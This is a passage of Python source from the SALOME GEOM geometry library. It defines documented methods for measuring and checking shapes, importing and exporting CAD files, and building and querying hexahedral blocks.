@ManageTransactions("MeasuOp")
def WhatIs(self,theShape):
"""
Obtain description of the given shape (number of sub-shapes of each type)
Parameters:
theShape Shape to be described.
Returns:
Description of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aDescr = self.MeasuOp.WhatIs(theShape)
RaiseIfFailed("WhatIs", self.MeasuOp)
return aDescr
## Obtain quantity of shapes of the given type in \a theShape.
# If \a theShape is of type \a theType, it is also counted.
# @param theShape Shape to be described.
# @param theType the given ShapeType().
# @return Quantity of shapes of type \a theType in \a theShape.
#
# @ref tui_measurement_tools_page "Example"
def NbShapes (self, theShape, theType):
"""
Obtain quantity of shapes of the given type in theShape.
If theShape is of type theType, it is also counted.
Parameters:
theShape Shape to be described.
theType the given geompy.ShapeType
Returns:
Quantity of shapes of type theType in theShape.
"""
# Example: see GEOM_TestMeasures.py
listSh = self.SubShapeAllIDs(theShape, theType)
Nb = len(listSh)
return Nb
## Obtain quantity of shapes of each type in \a theShape.
# The \a theShape is also counted.
# @param theShape Shape to be described.
# @return Dictionary of ShapeType() with bound quantities of shapes.
#
# @ref tui_measurement_tools_page "Example"
def ShapeInfo (self, theShape):
"""
Obtain quantity of shapes of each type in theShape.
The theShape is also counted.
Parameters:
theShape Shape to be described.
Returns:
Dictionary of geompy.ShapeType with bound quantities of shapes.
"""
# Example: see GEOM_TestMeasures.py
aDict = {}
for typeSh in self.ShapeType:
if typeSh in ( "AUTO", "SHAPE" ): continue
listSh = self.SubShapeAllIDs(theShape, self.ShapeType[typeSh])
Nb = len(listSh)
aDict[typeSh] = Nb
pass
return aDict
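# Usage sketch (for a box-like solid the dictionary would contain, e.g.,
# "FACE": 6, "EDGE": 12, "VERTEX": 8 among its entries):
#   info = geompy.ShapeInfo(aShape)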
def GetCreationInformation(self, theShape):
info = theShape.GetCreationInformation()
# operationName
opName = info.operationName
if not opName: opName = "no info available"
res = "Operation: " + opName
# parameters
for parVal in info.params:
res += " \n %s = %s" % ( parVal.name, parVal.value )
return res
## Get a point, situated at the centre of mass of theShape.
# @param theShape Shape to define centre of mass of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MakeCDG(self, theShape, theName=None):
"""
Get a point, situated at the centre of mass of theShape.
Parameters:
theShape Shape to define centre of mass of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetCentreOfMass(theShape)
RaiseIfFailed("GetCentreOfMass", self.MeasuOp)
self._autoPublish(anObj, theName, "centerOfMass")
return anObj
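# Usage sketch (the returned vertex sits at the centre of mass of 'aShape'):
#   cdg = geompy.MakeCDG(aShape)
#   x, y, z = geompy.PointCoordinates(cdg)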
## Get a vertex sub-shape by index, depending on the shape orientation.
# @param theShape Shape to find sub-shape.
# @param theIndex Index to find vertex by this index (starting from zero)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetVertexByIndex(self, theShape, theIndex, theName=None):
"""
Get a vertex sub-shape by index, depending on the shape orientation.
Parameters:
theShape Shape to find sub-shape.
theIndex Index to find vertex by this index (starting from zero)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetVertexByIndex(theShape, theIndex)
RaiseIfFailed("GetVertexByIndex", self.MeasuOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Get the first vertex of a wire/edge, depending on its orientation.
# @param theShape Shape to find first vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
def GetFirstVertex(self, theShape, theName=None):
"""
Get the first vertex of a wire/edge, depending on its orientation.
Parameters:
theShape Shape to find first vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
# note: auto-publishing is done in self.GetVertexByIndex()
return self.GetVertexByIndex(theShape, 0, theName)
## Get the last vertex of a wire/edge, depending on its orientation.
# @param theShape Shape to find last vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
def GetLastVertex(self, theShape, theName=None):
"""
Get the last vertex of a wire/edge, depending on its orientation.
Parameters:
theShape Shape to find last vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
nb_vert = self.NumberOfSubShapes(theShape, self.ShapeType["VERTEX"])
# note: auto-publishing is done in self.GetVertexByIndex()
return self.GetVertexByIndex(theShape, (nb_vert-1), theName)
## Get a normal to the given face. If the point is not given,
# the normal is calculated at the center of mass.
# @param theFace Face to define the normal of.
# @param theOptionalPoint Point to compute the normal at.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def GetNormal(self, theFace, theOptionalPoint = None, theName=None):
"""
Get a normal to the given face. If the point is not given,
the normal is calculated at the center of mass.
Parameters:
theFace Face to define the normal of.
theOptionalPoint Point to compute the normal at.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetNormal(theFace, theOptionalPoint)
RaiseIfFailed("GetNormal", self.MeasuOp)
self._autoPublish(anObj, theName, "normal")
return anObj
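# Usage sketch (no point given, so the normal is computed at the face's
# centre of mass):
#   n = geompy.GetNormal(aFace)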
## Print shape errors obtained from CheckShape.
# @param theShape Shape that was checked.
# @param theShapeErrors the shape errors obtained by CheckShape.
# @param theReturnStatus If 0, the description of the problem is printed.
# If 1, the description of the problem is returned.
# @return If theReturnStatus is equal to 1, the description is returned.
# Otherwise nothing is returned.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def PrintShapeErrors(self, theShape, theShapeErrors, theReturnStatus = 0):
"""
Print shape errors obtained from CheckShape.
Parameters:
theShape Shape that was checked.
theShapeErrors the shape errors obtained by CheckShape.
theReturnStatus If 0, the description of the problem is printed.
If 1, the description of the problem is returned.
Returns:
If theReturnStatus is equal to 1, the description is returned.
Otherwise nothing is returned.
"""
# Example: see GEOM_TestMeasures.py
Descr = self.MeasuOp.PrintShapeErrors(theShape, theShapeErrors)
if theReturnStatus == 1:
return Descr
print Descr
pass
## Check a topology of the given shape.
# @param theShape Shape to check validity of.
# @param theIsCheckGeom If FALSE, only the shape's topology will be checked, \n
# if TRUE, the shape's geometry will be checked also.
# @param theReturnStatus If 0 and theShape is invalid, a description
# of the problem is printed.
# If 1, the isValid flag and the description of the
# problem are returned.
# If 2, the isValid flag and the list of error data
# are returned.
# @return TRUE, if the shape "seems to be valid".
# If theShape is invalid, prints a description of problem.
# If theReturnStatus is equal to 1 the description is returned
# along with IsValid flag.
# If theReturnStatus is equal to 2 the list of error data is
# returned along with IsValid flag.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def CheckShape(self,theShape, theIsCheckGeom = 0, theReturnStatus = 0):
"""
Check a topology of the given shape.
Parameters:
theShape Shape to check validity of.
theIsCheckGeom If FALSE, only the shape's topology will be checked,
if TRUE, the shape's geometry will be checked also.
theReturnStatus If 0 and theShape is invalid, a description
of the problem is printed.
If 1, the IsValid flag and the description of the
problem are returned.
If 2, the IsValid flag and the list of error data
are returned.
Returns:
TRUE, if the shape "seems to be valid".
If theShape is invalid, prints a description of problem.
If theReturnStatus is equal to 1 the description is returned
along with IsValid flag.
If theReturnStatus is equal to 2 the list of error data is
returned along with IsValid flag.
"""
# Example: see GEOM_TestMeasures.py
if theIsCheckGeom:
(IsValid, ShapeErrors) = self.MeasuOp.CheckShapeWithGeometry(theShape)
RaiseIfFailed("CheckShapeWithGeometry", self.MeasuOp)
else:
(IsValid, ShapeErrors) = self.MeasuOp.CheckShape(theShape)
RaiseIfFailed("CheckShape", self.MeasuOp)
if IsValid == 0:
if theReturnStatus == 0:
Descr = self.MeasuOp.PrintShapeErrors(theShape, ShapeErrors)
print Descr
if theReturnStatus == 1:
Descr = self.MeasuOp.PrintShapeErrors(theShape, ShapeErrors)
return (IsValid, Descr)
elif theReturnStatus == 2:
return (IsValid, ShapeErrors)
return IsValid
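# Usage sketch (with theReturnStatus=1 an invalid shape yields a tuple
# (IsValid, description), while a valid one yields just the flag):
#   result = geompy.CheckShape(aShape, theIsCheckGeom=1, theReturnStatus=1)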
## Detect self-intersections in the given shape.
# @param theShape Shape to check.
# @return TRUE, if the shape contains no self-intersections.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def CheckSelfIntersections(self, theShape):
"""
Detect self-intersections in the given shape.
Parameters:
theShape Shape to check.
Returns:
TRUE, if the shape contains no self-intersections.
"""
# Example: see GEOM_TestMeasures.py
(IsValid, Pairs) = self.MeasuOp.CheckSelfIntersections(theShape)
RaiseIfFailed("CheckSelfIntersections", self.MeasuOp)
return IsValid
## Get position (LCS) of theShape.
#
# Origin of the LCS is situated at the shape's center of mass.
# Axes of the LCS are obtained from shape's location or,
# if the shape is a planar face, from position of its plane.
#
# @param theShape Shape to calculate position of.
# @return [Ox,Oy,Oz, Zx,Zy,Zz, Xx,Xy,Xz].
# Ox,Oy,Oz: Coordinates of shape's LCS origin.
# Zx,Zy,Zz: Coordinates of shape's LCS normal(main) direction.
# Xx,Xy,Xz: Coordinates of shape's LCS X direction.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def GetPosition(self,theShape):
"""
Get position (LCS) of theShape.
Origin of the LCS is situated at the shape's center of mass.
Axes of the LCS are obtained from shape's location or,
if the shape is a planar face, from position of its plane.
Parameters:
theShape Shape to calculate position of.
Returns:
[Ox,Oy,Oz, Zx,Zy,Zz, Xx,Xy,Xz].
Ox,Oy,Oz: Coordinates of shape's LCS origin.
Zx,Zy,Zz: Coordinates of shape's LCS normal(main) direction.
Xx,Xy,Xz: Coordinates of shape's LCS X direction.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetPosition(theShape)
RaiseIfFailed("GetPosition", self.MeasuOp)
return aTuple
## Get kind of theShape.
#
# @param theShape Shape to get a kind of.
# @return A kind of shape in terms of <VAR>GEOM.GEOM_IKindOfShape.shape_kind</VAR> enumeration
# and a list of parameters, describing the shape.
# @note The concrete meaning of each value returned via \a theIntegers
# or \a theDoubles depends on the kind() of the shape.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def KindOfShape(self,theShape):
"""
Get kind of theShape.
Parameters:
theShape Shape to get a kind of.
Returns:
a kind of shape in terms of GEOM_IKindOfShape.shape_kind enumeration
and a list of parameters, describing the shape.
Note:
The concrete meaning of each value returned via theIntegers
or theDoubles depends on the geompy.kind of the shape.
"""
# Example: see GEOM_TestMeasures.py
aRoughTuple = self.MeasuOp.KindOfShape(theShape)
RaiseIfFailed("KindOfShape", self.MeasuOp)
aKind = aRoughTuple[0]
anInts = aRoughTuple[1]
aDbls = aRoughTuple[2]
# Currently there is no exception from this rule:
aKindTuple = [aKind] + aDbls + anInts
# If exceptions appear, parameters will be regrouped for such kinds of shape.
# For example:
#if aKind == kind.SOME_KIND:
# # SOME_KIND int int double int double double
# aKindTuple = [aKind, anInts[0], anInts[1], aDbls[0], anInts[2], aDbls[1], aDbls[2]]
return aKindTuple
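# Usage sketch (the first element is the kind, e.g. kind.SPHERE, followed by
# the parameters describing the shape):
#   params = geompy.KindOfShape(aShape)
#   aKind = params[0]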
## Returns the string that describes if the shell is good for solid.
# This is a support method for MakeSolid.
#
# @param theShell the shell to be checked.
# @return A string that describes the shell validity for
# solid construction.
@ManageTransactions("MeasuOp")
def _IsGoodForSolid(self, theShell):
"""
Returns the string that describes if the shell is good for solid.
This is a support method for MakeSolid.
Parameter:
theShell the shell to be checked.
Returns:
A string that describes the shell validity for
solid construction.
"""
aDescr = self.MeasuOp.IsGoodForSolid(theShell)
return aDescr
# end of l2_measure
## @}
## @addtogroup l2_import_export
## @{
## Import a shape from the BREP, IGES, STEP or other file
# (depending on the given format) with the given name.
#
# Note: this function is deprecated; it is kept for backward compatibility only.
# Use Import<FormatName> instead, where <FormatName> is a name of desirable format to import.
#
# @param theFileName The file, containing the shape.
# @param theFormatName Specify format for the file reading.
# Available formats can be obtained with InsertOp.ImportTranslators() method.
# If format 'IGES_SCALE' is used instead of 'IGES' or
# format 'STEP_SCALE' is used instead of 'STEP',
# length unit will be set to 'meter' and result model will be scaled.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the imported shape.
# If material names are imported it returns the list of
# objects. The first one is the imported object followed by
# material groups.
# @note Auto publishing is allowed for the shape itself. Imported
# material groups are not automatically published.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def ImportFile(self, theFileName, theFormatName, theName=None):
"""
Import a shape from the BREP, IGES, STEP or other file
(depending on the given format) with the given name.
Note: this function is deprecated; it is kept for backward compatibility only.
Use Import<FormatName> instead, where <FormatName> is a name of desirable format to import.
Parameters:
theFileName The file, containing the shape.
theFormatName Specify format for the file reading.
Available formats can be obtained with geompy.InsertOp.ImportTranslators() method.
If format 'IGES_SCALE' is used instead of 'IGES' or
format 'STEP_SCALE' is used instead of 'STEP',
length unit will be set to 'meter' and result model will be scaled.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the imported shape.
If material names are imported it returns the list of
objects. The first one is the imported object followed by
material groups.
Note:
Auto publishing is allowed for the shape itself. Imported
material groups are not automatically published.
"""
# Example: see GEOM_TestOthers.py
print """
WARNING: Function ImportFile is deprecated, use Import<FormatName> instead,
where <FormatName> is a name of desirable format for importing.
"""
aListObj = self.InsertOp.ImportFile(theFileName, theFormatName)
RaiseIfFailed("ImportFile", self.InsertOp)
aNbObj = len(aListObj)
if aNbObj > 0:
self._autoPublish(aListObj[0], theName, "imported")
if aNbObj == 1:
return aListObj[0]
return aListObj
## Deprecated analog of ImportFile()
def Import(self, theFileName, theFormatName, theName=None):
"""
Deprecated analog of geompy.ImportFile, kept for backward compatibility only.
"""
# note: auto-publishing is done in self.ImportFile()
return self.ImportFile(theFileName, theFormatName, theName)
## Read a shape from the binary stream containing its boundary representation (BRep).
# @note This method will not be dumped to the python script by DumpStudy functionality.
# @note GEOM.GEOM_Object.GetShapeStream() method can be used to obtain the shape's BRep stream.
# @param theStream The BRep binary stream.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM_Object, containing the shape, read from theStream.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def RestoreShape (self, theStream, theName=None):
"""
Read a shape from the binary stream containing its boundary representation (BRep).
Note:
shape.GetShapeStream() method can be used to obtain the shape's BRep stream.
Parameters:
theStream The BRep binary stream.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM_Object, containing the shape, read from theStream.
"""
# Example: see GEOM_TestOthers.py
anObj = self.InsertOp.RestoreShape(theStream)
RaiseIfFailed("RestoreShape", self.InsertOp)
self._autoPublish(anObj, theName, "restored")
return anObj
## Export the given shape into a file with given name.
#
# Note: this function is deprecated; it is kept for backward compatibility only.
# Use Export<FormatName> instead, where <FormatName> is a name of desirable format to export.
#
# @param theObject Shape to be stored in the file.
# @param theFileName Name of the file to store the given shape in.
# @param theFormatName Specify format for the shape storage.
# Available formats can be obtained with
# geompy.InsertOp.ExportTranslators()[0] method.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def Export(self, theObject, theFileName, theFormatName):
"""
Export the given shape into a file with given name.
Note: this function is deprecated; it is kept for backward compatibility only.
Use Export<FormatName> instead, where <FormatName> is a name of desirable format to export.
Parameters:
theObject Shape to be stored in the file.
theFileName Name of the file to store the given shape in.
theFormatName Specify format for the shape storage.
Available formats can be obtained with
geompy.InsertOp.ExportTranslators()[0] method.
"""
# Example: see GEOM_TestOthers.py
print """
WARNING: Function Export is deprecated, use Export<FormatName> instead,
where <FormatName> is a name of desirable format for exporting.
"""
self.InsertOp.Export(theObject, theFileName, theFormatName)
if self.InsertOp.IsDone() == 0:
raise RuntimeError, "Export : " + self.InsertOp.GetErrorCode()
pass
pass
# end of l2_import_export
## @}
## @addtogroup l3_blocks
## @{
## Create a quadrangle face from four edges. Order of Edges is not
# important. It is not necessary that edges share the same vertex.
# @param E1,E2,E3,E4 Edges for the face bound.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example"
@ManageTransactions("BlocksOp")
def MakeQuad(self, E1, E2, E3, E4, theName=None):
"""
Create a quadrangle face from four edges. Order of Edges is not
important. It is not necessary that edges share the same vertex.
Parameters:
E1,E2,E3,E4 Edges for the face bound.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
qface1 = geompy.MakeQuad(edge1, edge2, edge3, edge4)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad(E1, E2, E3, E4)
RaiseIfFailed("MakeQuad", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a quadrangle face on two edges.
# The missing edges will be built by creating the shortest ones.
# @param E1,E2 Two opposite edges for the face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example"
@ManageTransactions("BlocksOp")
def MakeQuad2Edges(self, E1, E2, theName=None):
"""
Create a quadrangle face on two edges.
The missing edges will be built by creating the shortest ones.
Parameters:
E1,E2 Two opposite edges for the face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
# create vertices
p1 = geompy.MakeVertex( 0., 0., 0.)
p2 = geompy.MakeVertex(150., 30., 0.)
p3 = geompy.MakeVertex( 0., 120., 50.)
p4 = geompy.MakeVertex( 0., 40., 70.)
# create edges
edge1 = geompy.MakeEdge(p1, p2)
edge2 = geompy.MakeEdge(p3, p4)
# create a quadrangle face from two edges
qface2 = geompy.MakeQuad2Edges(edge1, edge2)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad2Edges(E1, E2)
RaiseIfFailed("MakeQuad2Edges", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a quadrangle face with specified corners.
# The missing edges will be built by creating the shortest ones.
# @param V1,V2,V3,V4 Corner vertices for the face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeQuad4Vertices "Example 2"
@ManageTransactions("BlocksOp")
def MakeQuad4Vertices(self, V1, V2, V3, V4, theName=None):
"""
Create a quadrangle face with specified corners.
The missing edges will be built by creating the shortest ones.
Parameters:
V1,V2,V3,V4 Corner vertices for the face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
Example of usage:
# create vertices
p1 = geompy.MakeVertex( 0., 0., 0.)
p2 = geompy.MakeVertex(150., 30., 0.)
p3 = geompy.MakeVertex( 0., 120., 50.)
p4 = geompy.MakeVertex( 0., 40., 70.)
# create a quadrangle from four points in its corners
qface3 = geompy.MakeQuad4Vertices(p1, p2, p3, p4)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeQuad4Vertices(V1, V2, V3, V4)
RaiseIfFailed("MakeQuad4Vertices", self.BlocksOp)
self._autoPublish(anObj, theName, "quad")
return anObj
## Create a hexahedral solid, bounded by the six given faces. Order of
# faces is not important. It is not necessary that Faces share the same edge.
# @param F1,F2,F3,F4,F5,F6 Faces for the hexahedral solid.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeHexa "Example 2"
@ManageTransactions("BlocksOp")
def MakeHexa(self, F1, F2, F3, F4, F5, F6, theName=None):
"""
Create a hexahedral solid, bounded by the six given faces. Order of
faces is not important. It is not necessary that Faces share the same edge.
Parameters:
F1,F2,F3,F4,F5,F6 Faces for the hexahedral solid.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
Example of usage:
solid = geompy.MakeHexa(qface1, qface2, qface3, qface4, qface5, qface6)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeHexa(F1, F2, F3, F4, F5, F6)
RaiseIfFailed("MakeHexa", self.BlocksOp)
self._autoPublish(anObj, theName, "hexa")
return anObj
## Create a hexahedral solid between two given faces.
# The missing faces will be built by creating the smallest ones.
# @param F1,F2 Two opposite faces for the hexahedral solid.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_building_by_blocks_page "Example 1"
# \n @ref swig_MakeHexa2Faces "Example 2"
@ManageTransactions("BlocksOp")
def MakeHexa2Faces(self, F1, F2, theName=None):
"""
Create a hexahedral solid between two given faces.
The missing faces will be built by creating the smallest ones.
Parameters:
F1,F2 Two opposite faces for the hexahedral solid.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
Example of usage:
solid1 = geompy.MakeHexa2Faces(qface1, qface2)
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.MakeHexa2Faces(F1, F2)
RaiseIfFailed("MakeHexa2Faces", self.BlocksOp)
self._autoPublish(anObj, theName, "hexa")
return anObj
# end of l3_blocks
## @}
## @addtogroup l3_blocks_op
## @{
## Get a vertex, found in the given shape by its coordinates.
# @param theShape Block or a compound of blocks.
# @param theX,theY,theZ Coordinates of the sought vertex.
# @param theEpsilon Maximum allowed distance between the resulting
# vertex and point with the given coordinates.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found vertex.
#
# @ref swig_GetPoint "Example"
@ManageTransactions("BlocksOp")
def GetPoint(self, theShape, theX, theY, theZ, theEpsilon, theName=None):
"""
Get a vertex, found in the given shape by its coordinates.
Parameters:
theShape Block or a compound of blocks.
theX,theY,theZ Coordinates of the sought vertex.
theEpsilon Maximum allowed distance between the resulting
vertex and point with the given coordinates.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found vertex.
Example of usage:
pnt = geompy.GetPoint(shape, -50, 50, 50, 0.01)
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetPoint(theShape, theX, theY, theZ, theEpsilon)
RaiseIfFailed("GetPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Find a vertex of the given shape, which has minimal distance to the given point.
# @param theShape Any shape.
# @param thePoint Point, close to the desired vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found vertex.
#
# @ref swig_GetVertexNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetVertexNearPoint(self, theShape, thePoint, theName=None):
"""
Find a vertex of the given shape, which has minimal distance to the given point.
Parameters:
theShape Any shape.
thePoint Point, close to the desired vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found vertex.
Example of usage:
pmidle = geompy.MakeVertex(50, 0, 50)
vertex1 = geompy.GetVertexNearPoint(blocksComp, pmidle)
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetVertexNearPoint(theShape, thePoint)
RaiseIfFailed("GetVertexNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Get an edge, found in the given shape by two given vertices.
# @param theShape Block or a compound of blocks.
# @param thePoint1,thePoint2 Points, close to the ends of the desired edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found edge.
#
# @ref swig_GetEdge "Example"
@ManageTransactions("BlocksOp")
def GetEdge(self, theShape, thePoint1, thePoint2, theName=None):
"""
Get an edge, found in the given shape by two given vertices.
Parameters:
theShape Block or a compound of blocks.
thePoint1,thePoint2 Points, close to the ends of the desired edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found edge.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetEdge(theShape, thePoint1, thePoint2)
RaiseIfFailed("GetEdge", self.BlocksOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Find an edge of the given shape, which has minimal distance to the given point.
# @param theShape Block or a compound of blocks.
# @param thePoint Point, close to the desired edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found edge.
#
# @ref swig_GetEdgeNearPoint "Example"
@ManageTransactions("BlocksOp")
def GetEdgeNearPoint(self, theShape, thePoint, theName=None):
"""
Find an edge of the given shape, which has minimal distance to the given point.
Parameters:
theShape Block or a compound of blocks.
thePoint Point, close to the desired edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found edge.
"""
# Example: see GEOM_TestOthers.py
anObj = self.BlocksOp.GetEdgeNearPoint(theShape, thePoint)
RaiseIfFailed("GetEdgeNearPoint", self.BlocksOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Returns a face, found in the given shape by four given corner vertices.
# @param theShape Block or a compound of blocks.
# @param thePoint1,thePoint2,thePoint3,thePoint4 Points, close to the corners of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByPoints(self, theShape, thePoint1, thePoint2, thePoint3, thePoint4, theName=None):
"""
Returns a face, found in the given shape by four given corner vertices.
Parameters:
theShape Block or a compound of blocks.
thePoint1,thePoint2,thePoint3,thePoint4 Points, close to the corners of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByPoints(theShape, thePoint1, thePoint2, thePoint3, thePoint4)
RaiseIfFailed("GetFaceByPoints", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Get a face of block, found in the given shape by two given edges.
# @param theShape Block or a compound of blocks.
# @param theEdge1,theEdge2 Edges, close to the edges of the desired face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the found face.
#
# @ref swig_todo "Example"
@ManageTransactions("BlocksOp")
def GetFaceByEdges(self, theShape, theEdge1, theEdge2, theName=None):
"""
Get a face of block, found in the given shape by two given edges.
Parameters:
theShape Block or a compound of blocks.
theEdge1,theEdge2 Edges, close to the edges of the desired face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the found face.
"""
# Example: see GEOM_Spanner.py
anObj = self.BlocksOp.GetFaceByEdges(theShape, theEdge1, theEdge2)
RaiseIfFailed("GetFaceByEdges", self.BlocksOp)
self._autoPublish(anObj, theName, "face")
return anObj
## Find a face, opposite to the given one in the given block.
# @param theBlock Must be a hexahedral solid.
